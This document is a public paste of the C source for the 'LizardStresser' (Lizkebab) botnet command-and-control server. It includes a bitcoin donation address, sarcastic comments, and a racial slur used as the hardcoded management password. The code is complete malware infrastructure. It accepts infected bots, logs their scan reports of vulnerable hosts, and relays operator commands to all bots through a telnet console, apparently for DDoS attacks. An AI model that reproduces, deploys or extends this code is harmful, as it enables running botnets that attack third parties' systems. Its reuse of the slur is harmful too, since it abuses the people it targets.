Lizkebab.c Source (Public Source Just Refreshed)

1. /*
2. Chippy1337 and @packetprophet present:
3. LizardStresser rekt
4. This is the custom control server
5.  
6. LICENSE AGREEMENT:
7. If you lulz'd, you must sent BTC to
8. 121cywjXYCUSL2qN7MnQAzSHNsWotUrea7
9.  
10. Death to skids
11. */
12. #include <stdio.h>
13. #include <stdlib.h>
14. #include <string.h>
15. #include <sys/types.h>
16. #include <sys/socket.h>
17. #include <netdb.h>
18. #include <unistd.h>
19. #include <time.h>
20. #include <fcntl.h>
21. #include <sys/epoll.h>
22. #include <errno.h>
23. #include <pthread.h>
24. #include <signal.h>
25.  
26. #define MY_MGM_PASS "nigger"
27. #define MY_MGM_PORT 8888
28.  
29. #define MAXFDS 1000000 // No way we actually reach this amount. Ever.
30.  
31. struct clientdata_t {
32. uint32_t ip;
33. char build[7];
34. char connected;
35. } clients[MAXFDS];
36. struct telnetdata_t {
37. int connected;
38. } managements[MAXFDS];
39. static volatile FILE *fileFD;
40. static volatile int epollFD = 0;
41. static volatile int listenFD = 0;
42. static volatile int managesConnected = 0;
43. int fdgets(unsigned char *buffer, int bufferSize, int fd)
44. {
45. int total = 0, got = 1;
46. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
47. return got;
48. }
49. void trim(char *str) // Remove whitespace from a string and properly null-terminate it.
50. {
51. int i;
52. int begin = 0;
53. int end = strlen(str) - 1;
54. while (isspace(str[begin])) begin++;
55. while ((end >= begin) && isspace(str[end])) end--;
56. for (i = begin; i <= end; i++) str[i - begin] = str[i];
57. str[i - begin] = '\0';
58. }
59.  
60.  
61. static int make_socket_non_blocking (int sfd)
62. { // man fcntl
63. int flags, s;
64. flags = fcntl (sfd, F_GETFL, 0);
65. if (flags == -1)
66. {
67. perror ("fcntl");
68. return -1;
69. }
70. flags |= O_NONBLOCK;
71. /*
72. F_SETFL (int)
73. Set the file status flags to the value specified by arg. File access mode (O_RDONLY, O_WRONLY, O_RDWR) and file creation flags (i.e., O_CREAT, O_EXCL, O_NOCTTY, O_TRUNC) in arg are
74. ignored. On Linux this command can change only the O_APPEND, O_ASYNC, O_DIRECT, O_NOATIME, and O_NONBLOCK flags.
75. */
76. s = fcntl (sfd, F_SETFL, flags);
77. if (s == -1)
78. {
79. perror ("fcntl");
80. return -1;
81. }
82. return 0;
83. }
84.  
85.  
86. static int create_and_bind (char *port)
87. {
88. struct addrinfo hints;
89. struct addrinfo *result, *rp;
90. int s, sfd;
91. memset (&hints, 0, sizeof (struct addrinfo));
92. hints.ai_family = AF_UNSPEC; /* Return IPv4 and IPv6 choices */
93. hints.ai_socktype = SOCK_STREAM; /* We want a TCP socket */
94. hints.ai_flags = AI_PASSIVE; /* All interfaces */
95. s = getaddrinfo (NULL, port, &hints, &result);
96. if (s != 0)
97. {
98. fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (s));
99. return -1;
100. }
101. for (rp = result; rp != NULL; rp = rp->ai_next)
102. {
103. sfd = socket (rp->ai_family, rp->ai_socktype, rp->ai_protocol);
104. if (sfd == -1) continue;
105. int yes = 1;
106. if ( setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1 ) perror("setsockopt");
107. s = bind (sfd, rp->ai_addr, rp->ai_addrlen);
108. if (s == 0)
109. {
110. break;
111. }
112. close (sfd);
113. }
114. if (rp == NULL)
115. {
116. fprintf (stderr, "Could not bind\n");
117. return -1;
118. }
119. freeaddrinfo (result);
120. return sfd;
121. }
122. void broadcast(char *msg, int us) // sends message to all bots, notifies the management clients of this happening
123. {
124. int sendMGM = 1;
125. if(strcmp(msg, "PING") == 0) sendMGM = 0; // Don't send pings to management. Why? Because a human is going to ignore it.
126. char *wot = malloc(strlen(msg) + 10);
127. memset(wot, 0, strlen(msg) + 10);
128. strcpy(wot, msg);
129. trim(wot);
130. time_t rawtime;
131. struct tm * timeinfo;
132. time(&rawtime);
133. timeinfo = localtime(&rawtime);
134. char *timestamp = asctime(timeinfo);
135. trim(timestamp);
136. int i;
137. for(i = 0; i < MAXFDS; i++)
138. {
139. if(i == us || (!clients[i].connected && (sendMGM == 0 || !managements[i].connected))) continue;
140. if(sendMGM && managements[i].connected)
141. {
142. send(i, "\x1b[33m", 5, MSG_NOSIGNAL);
143. send(i, timestamp, strlen(timestamp), MSG_NOSIGNAL);
144. send(i, ": ", 2, MSG_NOSIGNAL);
145. } //just a prompt with a timestamp.
146. printf("sent to fd: %d\n", i); // debug info, possibly also intrusion detection. Tells you when a management client connected on command line.
147. send(i, msg, strlen(msg), MSG_NOSIGNAL);
148. if(sendMGM && managements[i].connected) send(i, "\r\n\x1b[31m> \x1b[0m", 13, MSG_NOSIGNAL); // send a cool looking prompt to a manager/admin
149. else send(i, "\n", 1, MSG_NOSIGNAL);
150. }
151. free(wot);
152. }
153.  
154. void *epollEventLoop(void *useless) // the big loop used to control each bot asynchronously. Many threads of this get spawned.
155. {
156. struct epoll_event event;
157. struct epoll_event *events;
158. int s;
159. events = calloc (MAXFDS, sizeof event);
160. while (1)
161. {
162. int n, i;
163. n = epoll_wait (epollFD, events, MAXFDS, -1);
164. for (i = 0; i < n; i++)
165. {
166. if ((events[i].events & EPOLLERR) || (events[i].events & EPOLLHUP) || (!(events[i].events & EPOLLIN)))
167. {
168. clients[events[i].data.fd].connected = 0;
169. close(events[i].data.fd);
170. continue;
171. }
172. else if (listenFD == events[i].data.fd)
173. {
174. while (1)
175. {
176. struct sockaddr in_addr;
177. socklen_t in_len;
178. int infd, ipIndex;
179.  
180. in_len = sizeof in_addr;
181. infd = accept (listenFD, &in_addr, &in_len); // accept a connection from a bot.
182. if (infd == -1)
183. {
184. if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break;
185. else
186. {
187. perror ("accept");
188. break;
189. }
190. }
191.  
192. clients[infd].ip = ((struct sockaddr_in *)&in_addr)->sin_addr.s_addr;
193.  
194. int dup = 0;
195. for(ipIndex = 0; ipIndex < MAXFDS; ipIndex++) // check for duplicate clients by seeing if any have the same IP as the one connecting
196. {
197. if(!clients[ipIndex].connected || ipIndex == infd) continue;
198.  
199. if(clients[ipIndex].ip == clients[infd].ip)
200. {
201. dup = 1;
202. break;
203. }
204. }
205.  
206. if(dup)
207. {
208. printf("dup client\n"); // warns the operator on command line
209. if(send(infd, "!* LOLNOGTFO\n", 13, MSG_NOSIGNAL) == -1) { close(infd); continue; } // orders all the bots to immediately kill themselves if we see a duplicate client! MAXIMUM PARANOIA
210. if(send(infd, "DUP\n", 4, MSG_NOSIGNAL) == -1) { close(infd); continue; } // same thing as above.
211. close(infd);
212. continue;
213. }
214.  
215. s = make_socket_non_blocking (infd);
216. if (s == -1) { close(infd); break; }
217.  
218. event.data.fd = infd;
219. event.events = EPOLLIN | EPOLLET;
220. s = epoll_ctl (epollFD, EPOLL_CTL_ADD, infd, &event);
221. if (s == -1)
222. {
223. perror ("epoll_ctl");
224. close(infd);
225. break;
226. }
227.  
228. clients[infd].connected = 1;
229. //send(infd, "!* SCANNER ON\n", 14, MSG_NOSIGNAL);
230. }
231. continue;
232. }
233. else
234. {
235. int thefd = events[i].data.fd;
236. struct clientdata_t *client = &(clients[thefd]);
237. int done = 0;
238. client->connected = 1;
239. while (1)
240. {
241. ssize_t count;
242. char buf[2048];
243. memset(buf, 0, sizeof buf);
244.  
245. while(memset(buf, 0, sizeof buf) && (count = fdgets(buf, sizeof buf, thefd)) > 0)
246. {
247. if(strstr(buf, "\n") == NULL) { done = 1; break; }
248. trim(buf);
249. if(strcmp(buf, "PING") == 0) // basic IRC-like ping/pong challenge/response to see if server is alive
250. {
251. if(send(thefd, "PONG\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // response
252. continue;
253. }
254. if(strstr(buf, "BUILD ") == buf)
255. {
256. char *build = strstr(buf, "BUILD ") + 6;
257. if(strlen(build) > 6) { printf("build bigger then 6\n"); done = 1; break; }
258. memset(client->build, 0, 7);
259. strcpy(client->build, build);
260. continue;
261. }
262. if(strstr(buf, "REPORT ") == buf) // received a report of a vulnerable system from a scan
263. {
264. char *line = strstr(buf, "REPORT ") + 7;
265. fprintf(fileFD, "%s\n", line); // let's write it out to disk without checking what it is!
266. fflush(fileFD);
267. //TODO: automatically exploit that particular IP after scanning for dir and uploading correct arch stuffs.
268. continue;
269. }
270. if(strcmp(buf, "PONG") == 0)
271. {
272. //should really add some checking or something but meh
273. continue;
274. }
275.  
276. printf("buf: \"%s\"\n", buf);
277. }
278.  
279. if (count == -1)
280. {
281. if (errno != EAGAIN)
282. {
283. done = 1;
284. }
285. break;
286. }
287. else if (count == 0)
288. {
289. done = 1;
290. break;
291. }
292. }
293.  
294. if (done)
295. {
296. client->connected = 0;
297. close(thefd);
298. }
299. }
300. }
301. }
302. }
303.  
304. unsigned int clientsConnected() // counts the number of bots connected by looping over every possible file descriptor and checking if it's connected or not
305. {
306. int i = 0, total = 0;
307. for(i = 0; i < MAXFDS; i++)
308. {
309. if(!clients[i].connected) continue;
310. total++;
311. }
312.  
313. return total;
314. }
315.  
316. void *titleWriter(void *sock) // just an informational banner
317. {
318. // this LOOKS vulnerable, but it's actually not.
319. // there's no way we can have 2000 digits' worth of clients/bots connected to overflow that char array
320. int thefd = (int)sock;
321. char string[2048];
322. while(1)
323. {
324. memset(string, 0, 2048);
325. sprintf(string, "%c]0;Bots connected: %d | Clients connected: %d%c", '\033', clientsConnected(), managesConnected, '\007');
326. // \007 is a bell character... causes a beep. Why is there a beep here?
327. if(send(thefd, string, strlen(string), MSG_NOSIGNAL) == -1) return;
328.  
329. sleep(2);
330. }
331. }
332.  
333.  
334. void *telnetWorker(void *sock)
335. {
336. int thefd = (int)sock;
337. managesConnected++;
338. pthread_t title;
339. char buf[2048];
340. memset(buf, 0, sizeof buf);
341.  
342. if(send(thefd, "password: ", 10, MSG_NOSIGNAL) == -1) goto end; /* failed to send... kill connection */
343. if(fdgets(buf, sizeof buf, thefd) < 1) goto end; /* no data, kill connection */
344. trim(buf);
345. if(strcmp(buf, MY_MGM_PASS) != 0) goto end; /* bad pass, kill connection */
346. memset(buf, 0, 2048);
347. if(send(thefd, "\033[1A", 4, MSG_NOSIGNAL) == -1) goto end;
348. pthread_create(&title, NULL, &titleWriter, sock); /* writes the informational banner to the admin after a login */
349. if(send(thefd, "\x1b[31m*****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
350. if(send(thefd, "* WELCOME TO THE BALL PIT *\r\n", 43, MSG_NOSIGNAL) == -1) goto end;
351. if(send(thefd, "* Now with \x1b[32mrefrigerator\x1b[31m support *\r\n", 53, MSG_NOSIGNAL) == -1) goto end;
352. if(send(thefd, "*****************************************\r\n\r\n> \x1b[0m", 51, MSG_NOSIGNAL) == -1) goto end;
353. /* If we can't send the useless banner, kill ourselves! Amazing error handling! */
354. managements[thefd].connected = 1;
355.  
356. while(fdgets(buf, sizeof buf, thefd) > 0)
357. {
358. trim(buf);
359. if(send(thefd, "\x1b[31m> \x1b[0m", 11, MSG_NOSIGNAL) == -1) goto end;
360. if(strlen(buf) == 0) continue;
361. printf("management: \"%s\"\n", buf);
362. broadcast(buf, thefd); // take a command, send it to the bots
363. memset(buf, 0, 2048);
364. }
365.  
366. end: // cleanup dead socket
367. managements[thefd].connected = 0;
368. close(thefd);
369. managesConnected--;
370. }
371.  
372. void *telnetListener(void *useless)
373. {
374. int sockfd, newsockfd;
375. socklen_t clilen;
376. struct sockaddr_in serv_addr, cli_addr;
377. sockfd = socket(AF_INET, SOCK_STREAM, 0);
378. if (sockfd < 0) perror("ERROR opening socket");
379. bzero((char *) &serv_addr, sizeof(serv_addr));
380. serv_addr.sin_family = AF_INET;
381. serv_addr.sin_addr.s_addr = INADDR_ANY;
382. serv_addr.sin_port = htons(MY_MGM_PORT);
383. if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) perror("ERROR on binding");
384. listen(sockfd,5);
385. clilen = sizeof(cli_addr);
386. while(1)
387. {
388. newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
389. if (newsockfd < 0) perror("ERROR on accept");
390. pthread_t thread;
391. pthread_create( &thread, NULL, &telnetWorker, (void *)newsockfd);
392. }
393. }
394.  
395. int main (int argc, char *argv[])
396. {
397. signal(SIGPIPE, SIG_IGN); // ignore broken pipe errors sent from kernel
398.  
399. int s, threads;
400. struct epoll_event event;
401.  
402. if (argc != 3)
403. {
404. fprintf (stderr, "Usage: %s [port] [threads]\n", argv[0]);
405. exit (EXIT_FAILURE);
406. }
407. fileFD = fopen("output.txt", "a+"); // TOCTOU vuln if we have access to CnC
408. threads = atoi(argv[2]);
409.  
410. listenFD = create_and_bind (argv[1]); // try to create a listening socket, die if we can't
411. if (listenFD == -1) abort ();
412.  
413. s = make_socket_non_blocking (listenFD); // try to make it nonblocking, die if we can't
414. if (s == -1) abort ();
415.  
416. s = listen (listenFD, SOMAXCONN); // listen with a huuuuge backlog, die if we can't
417. if (s == -1)
418. {
419. perror ("listen");
420. abort ();
421. }
422.  
423. epollFD = epoll_create1 (0); // make an epoll listener, die if we can't
424. if (epollFD == -1)
425. {
426. perror ("epoll_create");
427. abort ();
428. }
429.  
430. event.data.fd = listenFD;
431. event.events = EPOLLIN | EPOLLET;
432. s = epoll_ctl (epollFD, EPOLL_CTL_ADD, listenFD, &event);
433. if (s == -1)
434. {
435. perror ("epoll_ctl");
436. abort ();
437. }
438.  
439. pthread_t thread[threads + 2];
440. while(threads--)
441. {
442. pthread_create( &thread[threads + 1], NULL, &epollEventLoop, (void *) NULL); // make a thread to command each bot individually
443. }
444.  
445. pthread_create(&thread[0], NULL, &telnetListener, (void *)NULL);
446.  
447. while(1)
448. {
449. broadcast("PING", -1); // ping bots every 60 sec on the main thread
450.  
451. sleep(60);
452. }
453.  
454. close (listenFD);
455.  
456. return EXIT_SUCCESS;
457. }